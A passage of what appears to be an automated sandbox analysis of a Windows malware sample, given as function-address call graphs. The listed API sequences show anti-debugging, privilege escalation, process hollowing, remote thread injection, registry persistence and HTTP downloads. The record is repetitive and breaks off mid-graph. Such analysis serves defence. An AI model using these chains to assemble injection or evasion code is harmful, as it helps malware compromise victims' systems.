997 7ff7dbd51376 1252 7ff7dbd51050 LoadLibraryA GetProcAddress 997->1252 999 7ff7dbd51390 1253 7ff7dbd51050 LoadLibraryA GetProcAddress 999->1253 1001 7ff7dbd513aa 1254 7ff7dbd51050 LoadLibraryA GetProcAddress 1001->1254 1003 7ff7dbd513c4 1255 7ff7dbd51050 LoadLibraryA GetProcAddress 1003->1255 1005 7ff7dbd513de 1256 7ff7dbd51050 LoadLibraryA GetProcAddress 1005->1256 1007 7ff7dbd513f8 1257 7ff7dbd51050 LoadLibraryA GetProcAddress 1007->1257 1009 7ff7dbd51412 1258 7ff7dbd51050 LoadLibraryA GetProcAddress 1009->1258 1011 7ff7dbd5142c 1259 7ff7dbd51050 LoadLibraryA GetProcAddress 1011->1259 1013 7ff7dbd51446 1260 7ff7dbd51050 LoadLibraryA GetProcAddress 1013->1260 1015 7ff7dbd51460 1261 7ff7dbd51050 LoadLibraryA GetProcAddress 1015->1261 1017 7ff7dbd5147a 1262 7ff7dbd51050 LoadLibraryA GetProcAddress 1017->1262 1019 7ff7dbd51494 1263 7ff7dbd51050 LoadLibraryA GetProcAddress 1019->1263 1021 7ff7dbd514ae 1264 7ff7dbd51050 LoadLibraryA GetProcAddress 1021->1264 1023 7ff7dbd514c8 1265 7ff7dbd51050 LoadLibraryA GetProcAddress 1023->1265 1025 7ff7dbd514e2 1266 7ff7dbd51050 LoadLibraryA GetProcAddress 1025->1266 1027 7ff7dbd514fc 1267 7ff7dbd51050 LoadLibraryA GetProcAddress 1027->1267 1029 7ff7dbd51516 1268 7ff7dbd51050 LoadLibraryA GetProcAddress 1029->1268 1031 7ff7dbd51530 1269 7ff7dbd51050 LoadLibraryA GetProcAddress 1031->1269 1033 7ff7dbd5154a 1270 7ff7dbd51050 LoadLibraryA GetProcAddress 1033->1270 1035 7ff7dbd51564 1271 7ff7dbd51050 LoadLibraryA GetProcAddress 1035->1271 1037 7ff7dbd5157e 1272 7ff7dbd51050 LoadLibraryA GetProcAddress 1037->1272 1039 7ff7dbd51598 1273 7ff7dbd51050 LoadLibraryA GetProcAddress 1039->1273 1041 7ff7dbd515b2 1274 7ff7dbd51050 LoadLibraryA GetProcAddress 1041->1274 1043 7ff7dbd515cc 1275 7ff7dbd51050 LoadLibraryA GetProcAddress 1043->1275 1045 7ff7dbd515e6 1276 7ff7dbd51050 LoadLibraryA GetProcAddress 1045->1276 1047 7ff7dbd51600 1277 7ff7dbd51050 LoadLibraryA GetProcAddress 1047->1277 1049 7ff7dbd5161a 1278 7ff7dbd51050 LoadLibraryA GetProcAddress 1049->1278 1051 7ff7dbd51634 1279 7ff7dbd51050 LoadLibraryA GetProcAddress 1051->1279 1053 7ff7dbd5164e 1280 7ff7dbd51050 LoadLibraryA GetProcAddress 1053->1280 1055 7ff7dbd51668 1281 7ff7dbd51050 LoadLibraryA GetProcAddress 1055->1281 1057 7ff7dbd51682 1282 7ff7dbd51050 LoadLibraryA GetProcAddress 1057->1282 1059 7ff7dbd5169c 1283 7ff7dbd51050 LoadLibraryA GetProcAddress 1059->1283 1061 7ff7dbd516b6 1284 7ff7dbd51050 LoadLibraryA GetProcAddress 1061->1284 1063 7ff7dbd516d0 1285 7ff7dbd51050 LoadLibraryA GetProcAddress 1063->1285 1065 7ff7dbd516ea 1286 7ff7dbd51050 LoadLibraryA GetProcAddress 1065->1286 1067 7ff7dbd51704 1287 7ff7dbd51050 LoadLibraryA GetProcAddress 1067->1287 1069 7ff7dbd5171e 1288 7ff7dbd51050 LoadLibraryA GetProcAddress 1069->1288 1071 7ff7dbd51738 1289 7ff7dbd51050 LoadLibraryA GetProcAddress 1071->1289 1073 7ff7dbd51752 1290 7ff7dbd51050 LoadLibraryA GetProcAddress 1073->1290 1075 7ff7dbd5176c 1291 7ff7dbd51050 LoadLibraryA GetProcAddress 1075->1291 1077 7ff7dbd51786 1292 7ff7dbd51050 LoadLibraryA GetProcAddress 1077->1292 1079 7ff7dbd517a0 1293 7ff7dbd51050 LoadLibraryA GetProcAddress 1079->1293 1081 7ff7dbd517ba 1294 7ff7dbd51050 LoadLibraryA GetProcAddress 1081->1294 1083 7ff7dbd517d4 1295 7ff7dbd51050 LoadLibraryA GetProcAddress 1083->1295 1085 7ff7dbd517ee 1296 7ff7dbd51050 LoadLibraryA GetProcAddress 1085->1296 1087 7ff7dbd51808 1297 7ff7dbd51050 LoadLibraryA GetProcAddress 1087->1297 1089 7ff7dbd51822 1298 7ff7dbd51050 LoadLibraryA GetProcAddress 1089->1298 1091 7ff7dbd5183c 1299 7ff7dbd51050 LoadLibraryA GetProcAddress 1091->1299 1093 7ff7dbd51856 1300 7ff7dbd51050 LoadLibraryA GetProcAddress 1093->1300 1095 7ff7dbd51870 1301 7ff7dbd51050 LoadLibraryA GetProcAddress 1095->1301 1097 7ff7dbd5188a 1302 7ff7dbd51050 LoadLibraryA GetProcAddress 1097->1302 1099 7ff7dbd518a4 1303 7ff7dbd51050 LoadLibraryA GetProcAddress 1099->1303 1101 7ff7dbd518be 1304 7ff7dbd51050 LoadLibraryA GetProcAddress 1101->1304 1103 7ff7dbd518d8 1305 7ff7dbd51050 LoadLibraryA GetProcAddress 1103->1305 1105 7ff7dbd518f2 1306 7ff7dbd51050 LoadLibraryA GetProcAddress 1105->1306 1107 7ff7dbd5190c 1307 7ff7dbd51050 LoadLibraryA GetProcAddress 1107->1307 1109 7ff7dbd51926 1308 7ff7dbd51050 LoadLibraryA GetProcAddress 1109->1308 1111 7ff7dbd51940 1309 7ff7dbd51050 LoadLibraryA GetProcAddress 1111->1309 1113 7ff7dbd5195a 1310 7ff7dbd51050 LoadLibraryA GetProcAddress 1113->1310 1115 7ff7dbd51974 1311 7ff7dbd51050 LoadLibraryA GetProcAddress 1115->1311 1117 7ff7dbd5198e 1312 7ff7dbd51050 LoadLibraryA GetProcAddress 1117->1312 1119 7ff7dbd519a8 1313 7ff7dbd51050 LoadLibraryA GetProcAddress 1119->1313 1121 7ff7dbd519c2 1314 7ff7dbd51050 LoadLibraryA GetProcAddress 1121->1314 1123 7ff7dbd519dc 1315 7ff7dbd51050 LoadLibraryA GetProcAddress 1123->1315 1125 7ff7dbd519f6 1316 7ff7dbd51050 LoadLibraryA GetProcAddress 1125->1316 1127 7ff7dbd51a10 1317 7ff7dbd51050 LoadLibraryA GetProcAddress 1127->1317 1129 7ff7dbd51a2a 1318 7ff7dbd51050 LoadLibraryA GetProcAddress 1129->1318 1131 7ff7dbd51a44 1319 7ff7dbd51050 LoadLibraryA GetProcAddress 1131->1319 1133 7ff7dbd51a5e 1320 7ff7dbd51050 LoadLibraryA GetProcAddress 1133->1320 1135 7ff7dbd51a78 1321 7ff7dbd51050 LoadLibraryA GetProcAddress 1135->1321 1137 7ff7dbd51a92 1322 7ff7dbd51050 LoadLibraryA GetProcAddress 1137->1322 1139 7ff7dbd51aac 1323 7ff7dbd51050 LoadLibraryA GetProcAddress 1139->1323 1141 7ff7dbd51ac6 1324 7ff7dbd51050 LoadLibraryA GetProcAddress 1141->1324 1143 7ff7dbd51ae0 1325 7ff7dbd51050 LoadLibraryA GetProcAddress 1143->1325 1145 7ff7dbd51afa 1326 7ff7dbd51050 LoadLibraryA GetProcAddress 1145->1326 1147 7ff7dbd51b14 1327 7ff7dbd51050 LoadLibraryA GetProcAddress 1147->1327 1149 7ff7dbd51b2e 1328 7ff7dbd51000 LoadLibraryA GetProcAddress 1149->1328 1151 7ff7dbd51b48 1329 7ff7dbd51050 LoadLibraryA GetProcAddress 1151->1329 1153 7ff7dbd51b62 1330 7ff7dbd51050 LoadLibraryA GetProcAddress 1153->1330 1155 7ff7dbd51b7c 1331 7ff7dbd51050 LoadLibraryA GetProcAddress 1155->1331 1157 7ff7dbd51b96 1332 7ff7dbd51050 LoadLibraryA GetProcAddress 1157->1332 1159 7ff7dbd51bb0 1333 7ff7dbd51050 LoadLibraryA GetProcAddress 1159->1333 1161 7ff7dbd51bca 1334 7ff7dbd51050 LoadLibraryA GetProcAddress 1161->1334 1163 7ff7dbd51be4 1335 7ff7dbd51050 LoadLibraryA GetProcAddress 1163->1335 1165 7ff7dbd51bfe 1336 7ff7dbd51000 LoadLibraryA GetProcAddress 1165->1336 1167 7ff7dbd51c18 1337 7ff7dbd51000 LoadLibraryA GetProcAddress 1167->1337 1169 7ff7dbd51c32 1338 7ff7dbd51050 LoadLibraryA GetProcAddress 1169->1338 1171 7ff7dbd51c4c 1339 7ff7dbd51050 LoadLibraryA GetProcAddress 1171->1339 1173 7ff7dbd51c66 1340 7ff7dbd51050 LoadLibraryA GetProcAddress 1173->1340 1175 7ff7dbd51c80 1341 7ff7dbd51050 LoadLibraryA GetProcAddress 1175->1341 1177 7ff7dbd51c9a 1342 7ff7dbd51050 LoadLibraryA GetProcAddress 1177->1342 1179 7ff7dbd51cb4 1343 7ff7dbd51050 LoadLibraryA GetProcAddress 1179->1343 1181 7ff7dbd51cce 1182 7ff7dbd5321c IsDebuggerPresent 1181->1182 1183 7ff7dbd5322e GetCurrentProcess CheckRemoteDebuggerPresent 1182->1183 1184 7ff7dbd5322a 1182->1184 1183->1184 1184->895 1184->896 1186 7ff7dbd5428a GetTokenInformation 1185->1186 1187 7ff7dbd53481 1185->1187 1344 7ff7dbd53b54 VirtualAlloc 1186->1344 1196 7ff7dbd53ce4 GetModuleFileNameW 1187->1196 1189 7ff7dbd542bb GetTokenInformation 1190 7ff7dbd542e8 CloseHandle 1189->1190 1191 7ff7dbd54302 AdjustTokenPrivileges CloseHandle 1189->1191 1192 7ff7dbd53b24 VirtualFree 1190->1192 1345 7ff7dbd53b24 1191->1345 1193 7ff7dbd542fd 1192->1193 1193->1187 1197 7ff7dbd53d0f PathFindFileNameW wcslen 1196->1197 1198 7ff7dbd53dd2 wcsncpy 1196->1198 1199 7ff7dbd53d49 1197->1199 1198->1199 1199->900 1201 7ff7dbd5356d 1200->1201 1202 7ff7dbd543d0 GetLastError 1200->1202 1201->926 1201->927 1202->1201 1203 7ff7dbd543dd CloseHandle 1202->1203 1203->1201 1348 7ff7dbd538c4 1204->1348 1206 7ff7dbd5328c 1351 7ff7dbd544b4 CreateFileW 1206->1351 1210 7ff7dbd53744 3 API calls 1209->1210 1211 7ff7dbd53a9f 1210->1211 1212 7ff7dbd538c4 11 API calls 1211->1212 1213 7ff7dbd53aa9 GetModuleFileNameW DeleteFileW CopyFileW 1212->1213 1214 7ff7dbd53aeb SetFileAttributesW 1213->1214 1215 7ff7dbd535a7 1213->1215 1368 7ff7dbd539b4 RegOpenKeyExW 1214->1368 1218 7ff7dbd533ec GetVersionExW 1215->1218 1219 7ff7dbd5341d 1218->1219 1219->936 1219->937 1221 7ff7dbd538c4 11 API calls 1220->1221 1222 7ff7dbd532fd 1221->1222 1371 7ff7dbd546e4 CreateFileW 1222->1371 1224 7ff7dbd53315 1225 7ff7dbd53357 CreateThread 1224->1225 1383 7ff7dbd540c4 1224->1383 1225->924 1229->953 1230->955 1231->957 1232->959 1233->961 1234->963 1235->965 1236->967 1237->969 1238->971 1239->973 1240->975 1241->977 1242->979 1243->981 1244->983 1245->985 1246->987 1247->989 1248->991 1249->993 1250->995 1251->997 1252->999 1253->1001 1254->1003 1255->1005 1256->1007 1257->1009 1258->1011 1259->1013 1260->1015 1261->1017 1262->1019 1263->1021 1264->1023 1265->1025 1266->1027 1267->1029 1268->1031 1269->1033 1270->1035 1271->1037 1272->1039 1273->1041 1274->1043 1275->1045 1276->1047 1277->1049 1278->1051 1279->1053 1280->1055 1281->1057 1282->1059 1283->1061 1284->1063 1285->1065 1286->1067 1287->1069 1288->1071 1289->1073 1290->1075 1291->1077 1292->1079 1293->1081 1294->1083 1295->1085 1296->1087 1297->1089 1298->1091 1299->1093 1300->1095 1301->1097 1302->1099 1303->1101 1304->1103 1305->1105 1306->1107 1307->1109 1308->1111 1309->1113 1310->1115 1311->1117 1312->1119 1313->1121 1314->1123 1315->1125 1316->1127 1317->1129 1318->1131 1319->1133 1320->1135 1321->1137 1322->1139 1323->1141 1324->1143 1325->1145 1326->1147 1327->1149 1328->1151 1329->1153 1330->1155 1331->1157 1332->1159 1333->1161 1334->1163 1335->1165 1336->1167 1337->1169 1338->1171 1339->1173 1340->1175 1341->1177 1342->1179 1343->1181 1344->1189 1346 7ff7dbd53b48 1345->1346 1347 7ff7dbd53b35 VirtualFree 1345->1347 1346->1187 1347->1346 1357 7ff7dbd53744 GetWindowsDirectoryW 1348->1357 1350 7ff7dbd538f3 8 API calls 1350->1206 1352 7ff7dbd5452b GetLastError 1351->1352 1353 7ff7dbd5450a 1351->1353 1355 7ff7dbd5329f CreateThread Sleep 1352->1355 1362 7ff7dbd54404 GetFileSize 1353->1362 1355->935 1358 7ff7dbd5378e 1357->1358 1359 7ff7dbd53798 GetVolumeInformationW 1357->1359 1358->1359 1360 7ff7dbd53814 1359->1360 1361 7ff7dbd5387e wsprintfW 1360->1361 1361->1350 1367 7ff7dbd53b54 VirtualAlloc 1362->1367 1364 7ff7dbd54430 1365 7ff7dbd54444 SetFilePointer ReadFile 1364->1365 1366 7ff7dbd5447a CloseHandle 1364->1366 1365->1366 1366->1355 1367->1364 1369 7ff7dbd539f9 RegSetValueExW RegCloseKey 1368->1369 1370 7ff7dbd539f5 1368->1370 1369->1370 1370->1215 1372 7ff7dbd54745 GetFileSize GetProcessHeap RtlAllocateHeap 1371->1372 1373 7ff7dbd5473e 1371->1373 1374 7ff7dbd5478e CloseHandle 1372->1374 1375 7ff7dbd547a0 ReadFile 1372->1375 1373->1224 1374->1373 1376 7ff7dbd547c7 GetProcessHeap HeapFree CloseHandle 1375->1376 1377 7ff7dbd547ef 1375->1377 1376->1373 1378 7ff7dbd54808 GetProcessHeap HeapFree CloseHandle 1377->1378 1380 7ff7dbd54830 1377->1380 1378->1373 1379 7ff7dbd5499b GetProcessHeap HeapFree CloseHandle 1379->1373 1380->1379 1381 7ff7dbd548eb GetProcessHeap RtlAllocateHeap 1380->1381 1382 7ff7dbd54934 1381->1382 1382->1379 1398 7ff7dbd54004 CreateToolhelp32Snapshot 1383->1398 1386 7ff7dbd540e4 1387 7ff7dbd5414b GetCurrentProcess OpenProcessToken 1386->1387 1388 7ff7dbd54168 LookupPrivilegeValueW 1387->1388 1389 7ff7dbd541c2 OpenProcess 1387->1389 1390 7ff7dbd541b7 CloseHandle 1388->1390 1391 7ff7dbd54190 AdjustTokenPrivileges 1388->1391 1392 7ff7dbd541ee 1389->1392 1396 7ff7dbd541e4 1389->1396 1390->1389 1391->1390 1392->1396 1397 7ff7dbd54222 WaitForSingleObject 1392->1397 1405 7ff7dbd52cb8 1392->1405 1394 7ff7dbd54244 CloseHandle 1395 7ff7dbd5424f 1394->1395 1395->1225 1396->1394 1396->1395 1397->1387 1397->1396 1399 7ff7dbd53342 1398->1399 1400 7ff7dbd5403f Process32FirstW 1398->1400 1399->1386 1401 7ff7dbd5405e wcscmp 1400->1401 1402 7ff7dbd54099 CloseHandle 1400->1402 1403 7ff7dbd54075 1401->1403 1404 7ff7dbd54082 Process32NextW 1401->1404 1402->1399 1403->1402 1404->1401 1404->1402 1406 7ff7dbd52d0b 1405->1406 1408 7ff7dbd52d4d VirtualAllocEx 1406->1408 1409 7ff7dbd52d2b 1406->1409 1413 7ff7dbd52a88 1406->1413 1408->1409 1410 7ff7dbd52d87 WriteProcessMemory 1408->1410 1409->1392 1410->1409 1411 7ff7dbd52dd0 VirtualProtectEx 1410->1411 1411->1409 1412 7ff7dbd52e03 CreateRemoteThread 1411->1412 1412->1406 1412->1409 1414 7ff7dbd52b01 1413->1414 1415 7ff7dbd52c0a StrStrA 1414->1415 1416 7ff7dbd52b08 1414->1416 1415->1414 1415->1416 1416->1406 1429 7ff7dbd51cdc 1430 7ff7dbd51d06 InternetOpenW 1429->1430 1431 7ff7dbd51d33 Sleep 1430->1431 1432 7ff7dbd51d40 InternetOpenUrlW 1430->1432 1431->1430 1433 7ff7dbd51d77 InternetOpenUrlW 1432->1433 1434 7ff7dbd51dc9 HttpQueryInfoA 1432->1434 1433->1434 1435 7ff7dbd51dae InternetCloseHandle Sleep 1433->1435 1436 7ff7dbd51e1e 1434->1436 1437 7ff7dbd51df8 InternetCloseHandle InternetCloseHandle Sleep 1434->1437 1435->1430 1438 7ff7dbd51e28 InternetCloseHandle InternetOpenUrlW 1436->1438 1439 7ff7dbd51e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1436->1439 1437->1430 1438->1439 1440 7ff7dbd51e6a InternetCloseHandle Sleep 1438->1440 1441 7ff7dbd51eea InternetCloseHandle InternetCloseHandle 1439->1441 1442 7ff7dbd51f04 1439->1442 1440->1430 1443 7ff7dbd51f83 1441->1443 1444 7ff7dbd51f0c InternetReadFile 1442->1444 1445 7ff7dbd51f5a InternetCloseHandle InternetCloseHandle 1442->1445 1444->1442 1444->1445 1445->1443 1446 7ff7dbd530dc 1451 7ff7dbd530e5 1446->1451 1447 7ff7dbd531d1 1450 7ff7dbd53c24 RegDeleteKeyW 1450->1451 1451->1447 1451->1450 1452 7ff7dbd53e24 9 API calls 1451->1452 1453 7ff7dbd539b4 3 API calls 1451->1453 1455 7ff7dbd545c4 CreateFileW 1451->1455 1460 7ff7dbd53b84 RegOpenKeyExW 1451->1460 1452->1451 1454 7ff7dbd531c1 Sleep 1453->1454 1454->1451 1456 7ff7dbd5465a 1455->1456 1457 7ff7dbd5461f 1455->1457 1456->1451 1463 7ff7dbd54544 SetFilePointer WriteFile SetEndOfFile 1457->1463 1459 7ff7dbd5463b SetFileAttributesW CloseHandle 1459->1456 1461 7ff7dbd53bd8 RegSetValueExW RegCloseKey 1460->1461 1462 7ff7dbd53c12 1460->1462 1461->1462 1462->1451 1463->1459 1480 7ff7dbd52f9c 1481 7ff7dbd538c4 11 API calls 1480->1481 1482 7ff7dbd52fdb 1481->1482 1483 7ff7dbd546e4 17 API calls 1482->1483 1484 7ff7dbd52fff 1483->1484 1485 7ff7dbd540c4 5 API calls 1484->1485 1486 7ff7dbd53022 1485->1486 1487 7ff7dbd540e4 13 API calls 1486->1487 1488 7ff7dbd53037 GetProcessHeap HeapFree 1487->1488 841 7ff7dbd5338c 844 7ff7dbd52048 GetModuleFileNameW 841->844 845 7ff7dbd520c9 844->845 853 7ff7dbd520c4 844->853 846 7ff7dbd5211d 845->846 847 7ff7dbd52107 845->847 887 7ff7dbd51f88 ExpandEnvironmentStringsW 846->887 849 7ff7dbd5213b 847->849 850 7ff7dbd52111 847->850 888 7ff7dbd51fc8 ExpandEnvironmentStringsW 849->888 850->853 889 7ff7dbd52008 ExpandEnvironmentStringsW 850->889 851 7ff7dbd52132 851->853 855 7ff7dbd5218d CreateProcessW 851->855 855->853 856 7ff7dbd521e8 CreateFileW 855->856 856->853 857 7ff7dbd5222f GetFileSize 856->857 858 7ff7dbd5224d 857->858 859 7ff7dbd52257 CloseHandle 857->859 858->859 860 7ff7dbd52267 VirtualAlloc 858->860 859->853 861 7ff7dbd522a1 ReadFile 860->861 862 7ff7dbd52291 CloseHandle 860->862 863 7ff7dbd522ce VirtualFree CloseHandle 861->863 864 7ff7dbd522f1 CloseHandle GetThreadContext 861->864 862->853 863->853 865 7ff7dbd52359 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 864->865 866 7ff7dbd52341 VirtualFree 864->866 867 7ff7dbd523f8 VirtualAllocEx 865->867 868 7ff7dbd523e0 VirtualFree 865->868 866->853 869 7ff7dbd5247b WriteProcessMemory 867->869 870 7ff7dbd52463 VirtualFree 867->870 868->853 871 7ff7dbd524b1 VirtualFree 869->871 874 7ff7dbd524c9 869->874 870->853 871->853 872 7ff7dbd524ff WriteProcessMemory 873 7ff7dbd5258a VirtualFree 872->873 872->874 873->853 874->872 879 7ff7dbd525a7 874->879 875 7ff7dbd52898 WriteProcessMemory SetThreadContext 877 7ff7dbd5291e VirtualFree 875->877 878 7ff7dbd52933 ResumeThread 875->878 876 7ff7dbd52619 RtlCompareMemory 876->879 883 7ff7dbd5266c 876->883 877->853 880 7ff7dbd5295a VirtualFree 878->880 881 7ff7dbd52945 VirtualFree 878->881 879->875 879->876 880->853 881->853 882 7ff7dbd52893 882->875 883->882 884 7ff7dbd5279c ReadProcessMemory WriteProcessMemory 883->884 885 7ff7dbd52889 884->885 886 7ff7dbd52871 VirtualFree 884->886 885->883 886->853 887->851 888->851 889->851 1420 7ff7dbd533ac 1421 7ff7dbd52048 37 API calls 1420->1421 1422 7ff7dbd533bf 1421->1422 1423 7ff7dbd52f0c CreateMutexA 1424 7ff7dbd52f4e GetLastError 1423->1424 1425 7ff7dbd52f31 ReleaseMutex CloseHandle 1423->1425 1427 7ff7dbd52f5b ReleaseMutex CloseHandle 1424->1427 1428 7ff7dbd52f78 ReleaseMutex CloseHandle 1424->1428 1426 7ff7dbd52f90 1425->1426 1427->1426 1428->1426 1464 7ff7dbd531ec 1465 7ff7dbd531f5 1464->1465 1466 7ff7dbd5320e 1465->1466 1469 7ff7dbd5306c 1465->1469 1474 7ff7dbd52e6c CreateMutexA 1469->1474 1472 7ff7dbd530cc Sleep 1472->1465 1473 7ff7dbd53087 Sleep CreateThread WaitForSingleObject 1473->1472 1475 7ff7dbd52e98 ReleaseMutex CloseHandle 1474->1475 1476 7ff7dbd52eb5 GetLastError 1474->1476 1477 7ff7dbd52ef7 1475->1477 1478 7ff7dbd52edf ReleaseMutex CloseHandle 1476->1478 1479 7ff7dbd52ec2 ReleaseMutex CloseHandle 1476->1479 1477->1472 1477->1473 1478->1477 1479->1477

                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                          callgraph 0 Function_00007FF7DBD5ABFB 1 Function_00007FF7DBD536FC 2 Function_00007FF7DBD5C2F7 3 Function_00007FF7DBD5ABF7 4 Function_00007FF7DBD5ABF9 5 Function_00007FF7DBD5C2F9 6 Function_00007FF7DBD5D904 7 Function_00007FF7DBD54404 102 Function_00007FF7DBD53B54 7->102 8 Function_00007FF7DBD54004 9 Function_00007FF7DBD51000 10 Function_00007FF7DBD5C501 11 Function_00007FF7DBD52F0C 12 Function_00007FF7DBD5E008 13 Function_00007FF7DBD5B508 14 Function_00007FF7DBD52008 15 Function_00007FF7DBD53609 16 Function_00007FF7DBD53F14 17 Function_00007FF7DBD53714 18 Function_00007FF7DBD5D615 19 Function_00007FF7DBD5D915 20 Function_00007FF7DBD51CDC 21 Function_00007FF7DBD530DC 44 Function_00007FF7DBD545C4 21->44 60 Function_00007FF7DBD539B4 21->60 66 Function_00007FF7DBD53B84 21->66 110 Function_00007FF7DBD53C24 21->110 111 Function_00007FF7DBD53E24 21->111 22 Function_00007FF7DBD5A0DD 23 Function_00007FF7DBD5EFD8 24 Function_00007FF7DBD536D8 25 Function_00007FF7DBD5B3DA 26 Function_00007FF7DBD540E4 40 Function_00007FF7DBD52CB8 26->40 27 Function_00007FF7DBD53CE4 28 Function_00007FF7DBD546E4 89 Function_00007FF7DBD54674 28->89 29 Function_00007FF7DBD536EC 30 Function_00007FF7DBD531EC 87 Function_00007FF7DBD5306C 30->87 31 Function_00007FF7DBD532EC 31->26 31->28 42 Function_00007FF7DBD538C4 31->42 43 Function_00007FF7DBD540C4 31->43 80 Function_00007FF7DBD53C64 31->80 32 Function_00007FF7DBD533EC 33 Function_00007FF7DBD5B2F4 34 Function_00007FF7DBD5E8F3 35 Function_00007FF7DBD5C2F5 36 Function_00007FF7DBD5ABF2 37 Function_00007FF7DBD5BCF1 38 Function_00007FF7DBD5EBBE 39 Function_00007FF7DBD5D8B8 71 Function_00007FF7DBD52A88 40->71 41 Function_00007FF7DBD5D0C4 95 Function_00007FF7DBD53744 42->95 43->8 96 Function_00007FF7DBD54544 44->96 45 Function_00007FF7DBD5DCC2 46 Function_00007FF7DBD5DEC1 47 Function_00007FF7DBD533CC 100 Function_00007FF7DBD52048 47->100 48 Function_00007FF7DBD5C9CB 49 Function_00007FF7DBD51FC8 50 Function_00007FF7DBD5A2D0 51 Function_00007FF7DBD52F9C 51->26 51->28 51->42 51->43 51->80 52 Function_00007FF7DBD5E99B 53 Function_00007FF7DBD5359D 54 Function_00007FF7DBD5E997 55 Function_00007FF7DBD5E999 56 Function_00007FF7DBD543A4 57 Function_00007FF7DBD510A0 57->9 104 Function_00007FF7DBD51050 57->104 58 Function_00007FF7DBD533AC 58->100 59 Function_00007FF7DBD5BEAD 61 Function_00007FF7DBD544B4 61->7 62 Function_00007FF7DBD5327C 62->42 62->61 63 Function_00007FF7DBD5A778 64 Function_00007FF7DBD5F278 65 Function_00007FF7DBD52978 67 Function_00007FF7DBD5A27F 68 Function_00007FF7DBD5F281 69 Function_00007FF7DBD5338C 69->100 70 Function_00007FF7DBD5A188 71->65 72 Function_00007FF7DBD51F88 73 Function_00007FF7DBD5EF92 74 Function_00007FF7DBD5C65C 75 Function_00007FF7DBD5345C 75->16 75->27 75->31 75->32 75->56 75->57 75->62 79 Function_00007FF7DBD54264 75->79 88 Function_00007FF7DBD53A74 75->88 106 Function_00007FF7DBD5321C 75->106 76 Function_00007FF7DBD5A258 77 Function_00007FF7DBD5A05A 78 Function_00007FF7DBD5DE59 79->102 109 Function_00007FF7DBD53B24 79->109 81 Function_00007FF7DBD5CF65 82 Function_00007FF7DBD5D365 83 Function_00007FF7DBD5B15F 84 Function_00007FF7DBD5A061 85 Function_00007FF7DBD5D361 86 Function_00007FF7DBD52E6C 87->86 88->42 88->60 88->95 90 Function_00007FF7DBD5C673 91 Function_00007FF7DBD5A776 92 Function_00007FF7DBD5DE70 93 Function_00007FF7DBD5A772 94 Function_00007FF7DBD5D339 95->17 97 Function_00007FF7DBD5DC46 98 Function_00007FF7DBD5D33F 99 Function_00007FF7DBD5A04E 100->14 100->49 100->72 101 Function_00007FF7DBD5CD54 103 Function_00007FF7DBD5DC55 105 Function_00007FF7DBD5A052 107 Function_00007FF7DBD5D91D 108 Function_00007FF7DBD5C91A 112 Function_00007FF7DBD5F232

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00007FF7DBD52048 Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 231 7ff7dbd52048-7ff7dbd520c2 GetModuleFileNameW 232 7ff7dbd520c9-7ff7dbd52105 231->232 233 7ff7dbd520c4 231->233 235 7ff7dbd5211d-7ff7dbd52139 call 7ff7dbd51f88 232->235 236 7ff7dbd52107-7ff7dbd5210f 232->236 234 7ff7dbd5296d-7ff7dbd52975 233->234 245 7ff7dbd5217c-7ff7dbd52186 235->245 238 7ff7dbd5213b-7ff7dbd52157 call 7ff7dbd51fc8 236->238 239 7ff7dbd52111-7ff7dbd52119 236->239 238->245 242 7ff7dbd5211b-7ff7dbd52177 239->242 243 7ff7dbd52159-7ff7dbd52175 call 7ff7dbd52008 239->243 242->234 243->245 249 7ff7dbd5218d-7ff7dbd521e1 CreateProcessW 245->249 250 7ff7dbd52188 245->250 251 7ff7dbd521e8-7ff7dbd52228 CreateFileW 249->251 252 7ff7dbd521e3 249->252 250->234 253 7ff7dbd5222a 251->253 254 7ff7dbd5222f-7ff7dbd5224b GetFileSize 251->254 252->234 253->234 255 7ff7dbd5224d-7ff7dbd52255 254->255 256 7ff7dbd52257-7ff7dbd52262 CloseHandle 254->256 255->256 257 7ff7dbd52267-7ff7dbd5228f VirtualAlloc 255->257 256->234 258 7ff7dbd522a1-7ff7dbd522cc ReadFile 257->258 259 7ff7dbd52291-7ff7dbd5229c CloseHandle 257->259 260 7ff7dbd522ce-7ff7dbd522ec VirtualFree CloseHandle 258->260 261 7ff7dbd522f1-7ff7dbd5233f CloseHandle GetThreadContext 258->261 259->234 260->234 262 7ff7dbd52359-7ff7dbd523de ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 261->262 263 7ff7dbd52341-7ff7dbd52354 VirtualFree 261->263 264 7ff7dbd523f8-7ff7dbd52461 VirtualAllocEx 262->264 265 7ff7dbd523e0-7ff7dbd523f3 VirtualFree 262->265 263->234 266 7ff7dbd5247b-7ff7dbd524af WriteProcessMemory 264->266 267 7ff7dbd52463-7ff7dbd52476 VirtualFree 264->267 265->234 268 7ff7dbd524c9-7ff7dbd524d4 266->268 269 7ff7dbd524b1-7ff7dbd524c4 VirtualFree 266->269 267->234 270 7ff7dbd524e6-7ff7dbd524f9 268->270 269->234 271 7ff7dbd525a7-7ff7dbd525ee 270->271 272 7ff7dbd524ff-7ff7dbd52588 WriteProcessMemory 270->272 275 7ff7dbd52600-7ff7dbd52613 271->275 273 7ff7dbd5258a-7ff7dbd5259d VirtualFree 272->273 274 7ff7dbd525a2 272->274 273->234 274->270 277 7ff7dbd52898-7ff7dbd5291c WriteProcessMemory SetThreadContext 275->277 278 7ff7dbd52619-7ff7dbd52668 RtlCompareMemory 275->278 279 7ff7dbd5291e-7ff7dbd52931 VirtualFree 277->279 280 7ff7dbd52933-7ff7dbd52943 ResumeThread 277->280 281 7ff7dbd5266c-7ff7dbd52695 278->281 282 7ff7dbd5266a 278->282 279->234 284 7ff7dbd5295a-7ff7dbd52967 VirtualFree 280->284 285 7ff7dbd52945-7ff7dbd52958 VirtualFree 280->285 286 7ff7dbd526a0-7ff7dbd526ae 281->286 282->275 284->234 285->234 287 7ff7dbd52893 286->287 288 7ff7dbd526b4-7ff7dbd5273f 286->288 287->277 289 